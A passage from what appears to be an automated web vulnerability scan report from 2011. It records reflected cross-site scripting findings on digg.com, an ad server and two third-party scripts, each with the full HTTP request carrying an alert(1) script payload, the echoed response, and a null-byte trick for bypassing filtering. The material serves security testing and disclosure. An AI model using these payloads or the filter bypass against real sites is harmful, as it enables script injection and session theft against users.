Referer: http://digg.com/submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2; traffic_control=f041000000601100001689866400%3A221%3A112; __utma=146621099.1841421009.1311085718.1311085718.1311085718.1; __utmb=146621099.1.10.1311085718; __utmc=146621099; __utmz=146621099.1311085718.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=146621099.|1=Tests=%2C115%3DN%2C122%3DN%2C164%3DN%2C214%3DN%2C220%3DN=1,2=Users=f%3DN%2Ct%3DN%2Cu%3D_=1; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; undefined_s=First%20Visit; s_nr=1311085718020; s_vnum=1313677718021%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=696877 10.2.130.24
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18423

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax%003d472"><script>alert(1)</script>dd8bfeb6e79/tooltip/submit?token=1311085708_f512e3f19fa7c46ecf738ea5b1e8e413d5d3afb12cbdfbb1323de756ece723b2.rss">
...[SNIP]...

4.104. http://digg.com/ajax/tooltip/submit [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/ajax/tooltip/submit

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003f18c"><script>alert(1)</script>987b09908e7 was submitted in the REST URL parameter 2. This input was echoed as 3f18c"><script>alert(1)</script>987b09908e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /ajax/tooltip%003f18c"><script>alert(1)</script>987b09908e7/submit?token=1311085708_f512e3f19fa7c46ecf738ea5b1e8e413d5d3afb12cbdfbb1323de756ece723b2 HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://digg.com/submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2; traffic_control=f041000000601100001689866400%3A221%3A112; __utma=146621099.1841421009.1311085718.1311085718.1311085718.1; __utmb=146621099.1.10.1311085718; __utmc=146621099; __utmz=146621099.1311085718.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=146621099.|1=Tests=%2C115%3DN%2C122%3DN%2C164%3DN%2C214%3DN%2C220%3DN=1,2=Users=f%3DN%2Ct%3DN%2Cu%3D_=1; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; undefined_s=First%20Visit; s_nr=1311085718020; s_vnum=1313677718021%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=421321 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18431

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax/tooltip%003f18c"><script>alert(1)</script>987b09908e7/submit?token=1311085708_f512e3f19fa7c46ecf738ea5b1e8e413d5d3afb12cbdfbb1323de756ece723b2.rss">
...[SNIP]...

4.105. http://digg.com/submit [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://digg.com
Path:	/submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c7d7a"><script>alert(1)</script>f1be7ad2499 was submitted in the REST URL parameter 1. This input was echoed as c7d7a"><script>alert(1)</script>f1be7ad2499 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /submit%00c7d7a"><script>alert(1)</script>f1be7ad2499?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:30:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=708118 10.2.129.49
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18628

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00c7d7a"><script>alert(1)</script>f1be7ad2499?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems.rss">
...[SNIP]...

4.106. http://ib.adnxs.com/ptj [redir parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95946'%3balert(1)//6711be401d1 was submitted in the redir parameter. This input was echoed as 95946';alert(1)//6711be401d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ptj?member=311&inv_code=cm.quadbostonglobe&size=160x600&imp_id=cm-10210473643_1311108278,11fda490648f83c&referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonglobe%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-10210473643_1311108278%2C11fda490648f83c%2Cnone%2Cax.{PRICEBUCKET}-bz.25%3B%3Bcmw%3Dnowl%3Bsz%3D160x600%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D551186%3Bcontx%3Dnone%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dbz.25%3Bord%3D1311108273%3F95946'%3balert(1)//6711be401d1 HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:47:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:47:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb865736=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII1LEDEAoYAiACKAIw1NqX8QQQ1NqX8QQYAQ..; path=/; expires=Mon, 17-Oct-2011 20:47:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb887655=5_[r^XI()v4FMSZKU:cHSV7Bm?enc=-FJ40Oy69z_ffZ-7blv1PwAAAEAzMwtA332fu25b9T_4UnjQ7Lr3PwIbxuWVHrQBOHCoZussF2RU7SVOAAAAAPcqCAA3AQAANQEAAAIAAACeyAcADSwBAAEAAABVU0QAVVNEAKAAWAKqKwAAzw8BAgUCAQUAAAAANiXwrwAAAAA.&tt_code=cm.quadbostonglobe&udj=uf%28%27a%27%2C+21322%2C+1311108436%29%3Buf%28%27r%27%2C+510110%2C+1311108436%29%3Bppv%2815053%2C+%27122756718999771906%27%2C+1311108436%2C+1316292436%2C+98060%2C+76813%29%3B&cnd=!niawKQiM_gUQnpEfGAAgjdgEMAA4qldAAEi1AlD31SBYAGDIAWgAcAJ4BIABAogBBJABAZgBAaABAagBA7ABALkBiKm88Oy69z_BAYipvPDsuvc_yQG0jpyV-OrbP9kBAAAAAAAA8D_gAQA.&ccd=!lwRFJgiM_gUQnpEfGI3YBCAA; path=/; expires=Wed, 20-Jul-2011 20:47:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rfQCe7?0P(*AuB-u**g1:XIBOG#yJ1hN)-R^0:8p7d!oK7UWL+#*K-$4$/nr%*K>4vNYxP0fQ4ob(Q)FrcgD>gUlpmowPR5St#!Oq*raj24<^IXNgeZ:R-z9hotxFq4D7U+E_^a2(TIGAEI]-hbvK>4L(R22Za2CHlx6yu$EFe*$y5PR+)i%[.ce9um'8$YSQ?l[3<O/+Jyyl*!W]1M`Nuw(8=Lnb-ndK:'oSJZT8lllP')@cvPhg!7gtG3TDqleDjk<On>r#%Ncs!)NZ^B/Cy2)G90+:usmpN$w86RUq5cwb?6Z'a; path=/; expires=Mon, 17-Oct-2011 20:47:16 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 19 Jul 2011 20:47:16 GMT
Content-Length: 414

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.quadbostonglobe/;net=cm;u=,cm-10210473643_1311108278,11fda490648f83c,none,ax.120-bz.25;;cmw=nowl;sz=160x600;net=cm;env=ifr;ord1=551186;contx=none;an=120;dc=w;btg=bz.25;ord=1311108273?95946';alert(1)//6711be401d1">
...[SNIP]...

4.107. http://image.providesupport.com/cmd/versionone [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://image.providesupport.com
Path:	/cmd/versionone

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bea88<script>alert(1)</script>40eaaf49c7e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmdbea88<script>alert(1)</script>40eaaf49c7e/versionone?ps_t=1311085407790&ps_l=http%3A//www.versionone.com/Product/&ps_r=http%3A//pm.versionone.com/AgilePoster.html%3Fc-aws%3Daps%26gr-apss%26v-010%26gclid%3DCNf6xcPNjaoCFcTe4AodVQ6rzQ&ps_s=md4i0utLDDtg HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.versionone.com/Product/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=md4i0utLDDtg

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Tue, 19 Jul 2011 14:23:21 GMT
Content-Length: 579

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /cmdbea88<script>alert(1)</script>40eaaf49c7e/versionone?ps_t=1311085407790&ps_l=http://www.versionone.com/Product/&ps_r=http://pm.versionone.com/AgilePoster.html?c-aws=aps&gr-apss&v-010&gclid=CNf6xcPNjaoCFcTe4AodVQ6rzQ&ps_s=md4i0utLDDtg
</pre>
...[SNIP]...

4.108. http://js.revsci.net/gateway/gw.js [csid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 405ea<script>alert(1)</script>c1eda980f6d was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=C07583405ea<script>alert(1)</script>c1eda980f6d&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpn3tsfwP3C13ELVR0CQCV8tpujhUfWhmS6NTgEmCnCZ++Kg6mfGQNWB4S7E4rk4kRS6EemAcxwlypsWECT4LBvY3ZVyCrts6XqdTZLTTjsU1Ta44fEsrqkF3QR8AOUEazdr73Yx/v5GsElQg2z/OxHimPEHU8H9vtdJVlTWa3RAtda3D/U67y/ubm7yMeD05sVGFPn1GloHXbGc6QArtZrs4LlIZSa0c/3WWqlPgJBCVF4jRqC3hM+vRmU6J2FYvvoyoAQBFW2qGWrCcQIr4DGDGoFFqkTIKf0vEd0h2I6LjYGgX1CvS21MywhPm/F6pyJL6pR60KkkHrWCMq8m9de56wmRRDdiuvI4U2dNhS1sPwTc8AJmULpuJf7j/y0mC8xQDfPOYuNpl9d48zBA1Db6kf5rrOZgz6Nsv6GDaVXGwPrqMpwbxTqEKyRJm4qd1YU0pC/+3cjUmDytTEVvwfzUhTic/Yr8YO74Yh1GljmAeoHUE/nBX5aURGIkYgXrs6Vc2sH3rBMi03t9mq/cL9Nj1G7oPtwlfosCDCW1s45wrzwmX1BVmtF3VeqdswFUzK7GoiF4ncwW7Thw974oEX5k9uHeLK9ubMWgFddOp5E+U1ixsBTiJzizMEic5ZimkGUiiA2SDkdPaPqcNbExXL9CUw8sCLmtGOg4b6dKWsniQFGvSsZr6SD0D6vrTL50s25Z6YG/uMCBW29BBgPISdd4nOKGOBBDGl8qd8YIQyBcJweaFIdSxXwooYodaQ4Y4xqzUi9fxCOPJydOz85nIM8KNhnKtW3HL74kCi591Z9kc08IWXL3x3rtVjY4YjjFdvlZH1bFa10yT8hjf9E2L44N2PoWw5Md/XVaVAlebEvmdjBjZ0hUKsaUOX1JzVhkBQ+KGzcx+sotktzYFcOwoEeKHZPtz5HryZmzu47uVTDhLOkBldHf+vrTGvT1QrAvsxqkQTDyPIQyQGBzDHQvl0TLZlZXMkeHlOYy2ULroOabknOi4aktm3dGtOGl+KB/AS3HyzbdCgi6BKGaN8PGmmeS9UIptYOh+SSzHDfIk1Xhl2hjQbO/ugEdqDYDzxTRBXRudZxYKFkueHvhVFlPQH83WEmQ1QD9yVKDYz8hbSfvcvIc4xblteaZg3Cr1RoeqL01TISneJPTII93k4HyMtQO9vpfkxofTWPDqHGQN0flp+qZ9RDQafFcsZZ/yMHHKtC2FnoFyZMbweX76sJrCybzpidSGnfinvvckpsBmXXqWv/WXgJq0JYZxkXmgSpOUan+W6t2NLXZQk6uBcMTaMyS6ZIRJtPwG1V5ojzmtrOP1xJjVHroOP37vmPnBK7aplXTPZ7APFyxXHub+Sh7ScDaetlyS3joMbfIhHGNBDCxxt7CMI4OkocONePsFdRy4lLyEbAB69B4uZJRgboLOgUIpb9kVC1/fb5RAacwDUEBee7IwtZ8I4i+4+Es2Vz5qkMbQsE04r8/eirLSb86MAm/Kc+2GigTWoHGK5AYrpfgPfB2AYZn7fdaAY0GB9B3W1mmPM0N2m7oUr0GzTCDA8llTSp/W++zggVRL5RNuhm4t23/CGDzIFUjHnwYa6q4lbFRwblEuM6P8Bm997Ei12i+TbSga+YKk6qJI/1rqyenbNJhmvKp+VjvEW4DWQkDwnPTRd0hx4NMbkkWHgjaogiL2OKACU7kfOe05M28O8IhCEnkgatzwM24rVjViBkVbYcIGr2s6sN4nM6JXd6Y42yYDFbOWR+7XVbVuMKJiTwYiIg+9uZ+JgSNIPedCW7IEltpSm3gGVxp1cnmwgOzdoycrFzWMjJhorPz+oofpq7CZiZwecNku6gOEQtxXSbfUjQrno=; rsi_segs_1000000=pUP94z+henIMH/C100a+jhgB5JQz9IY1FIa6Tm94OcJbus0+9LWt9uNg2v/oPlIcMX++9Sai/up6K4JoYxbTJtjJw67a4dAyP1rLMPPNf8+aF3KjorlwYWigFiDN8HXuymtY/8mZrBaVwjk7jhzQieeyWjePC1nNMnF9Uq187o0DW0axE8uqS+hiEBYEcYeIaWufeMRzQ6AsLOgLXVuWTOVKjAyo4BqcItT4EdQfOFZpvT8JVAHJxLHxEq4chk84g4aQoKIFE6nbu8sHtv1wbn3dcIDjQl2ic2FultsytuTkiR8SRG4+2iN1NXX+i0matqTYj7ODk66zO+jFqknjKVZxPOIXk76IkPIxfvvZuK1QWi4m8F6FSICsQJ6qcOpvHuzJZo3ZqJ2CI1FMCRsapDA5ww6SKOXpA7HkpaxvDhDNOdvuDJNcOusnbDWRzfdDrAZDP4Z6GarUTuVkOmtXCN0NyrpfnBl14Zdjh+QfP/OUpkYzsCBTbfmLykQ2f+NeLSQRx1lb+SuWvDX8zCU9cEELiQ5gA9zC2Coux7awYbO3fx80EFhxIsNcnWqm39A+9ZVe60O4/7iLv1qaXAXdlPAsw9x8hNmk2rJqahfB+k4pYuU+hwIZv7XvryMqavNb6aayfAhfD2UZqJUDEiDIcMbDb88AyjODp7s1s72qQuXfQeclkV3aMfapt78a+7vev0IzfhU8PmWD2U2IbXN87zTV4qfnhfQCyhq5V3SUTsBa44CpYg9FbhfNknZM3bSBKOlpqx6I7+qkHbCT9pdIDN8IHKTcWqzP; rtc_gxm3=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; rsiPus_kpxr="MLsXtSUNZzhvJpH4+tKkOoj8ntlBfYhpEw27Sgdm26iivu1jMXrkolpihGBj4llhxoQ3etX0vIp6oTU6utPqiiY+q0sx9SZq3j9cxNBBOTGkTUzMMcfOycMr/RCdSAZbrYe7MR41Ml8P0TCrYF9UtXf6D83ChO020avNadiJ0sMNIxbXO9TZCAjf/B0U1QBTGISffV1CXeQy/Q9+Vsi1tAFjh63CWoW7lbQ1X+MM22FfbwuxngshaR0fwX/fD4W+yJj7/VWRRLYCYuhPcnKafgAst0jtLE2+Wf8kEa39J7+bN6XUByr7MX11X+aNOsJpqBYZU+6PWTFj0xxCVlJeC0H2nJ8/7vjk0U1lqVwFbfETfD25gPv0d2qBQfqzxSyR+jgdm/cye29eCnCatgRbhuRHomyUj/leb0nNtKuAIULlNeYV/gmjkZRDcj2uROQpryf7ex2bihe1gZSbYjZNrhak7q1+6hKGf6HOuM/baUhUMxe9/tF5Y7253PUv1YhZo6/80WO1vvW1yOobrIxtrdxXgDTiEkg+JHfmGdJbdNjWTnDSlwdtk9aL5TM6m74RiKi5XGC4b7u3yJT5S/AuvvgRBAHbAPCRCK6AyIFM5sL/76HM3rAmJoxjITkzacdFyI2MsH461K6ogE96hFMGAQZ58FhBsueAh9zwYYTa4WE0uj14mgUez3U4OO3OIBsNSmwdDAzjJ/LfTVWJC0KbxQF4wTVviqKj2hgaE6Oh1pzLmPv1EL8bTJnB5xiMHUgesx7wqtKQ2fl5o6PFAQUIvzdGkYBnEpNfDYz+FLWjKYxhb6ZL1MiU+aDmtXvtg8HZ6ghqHQjD4aMO749hTnc8Y8YtOlKc1IK2PtzGq1oxPJ+7weDGtjC/tKJdZpuH37zztp7oTkZEV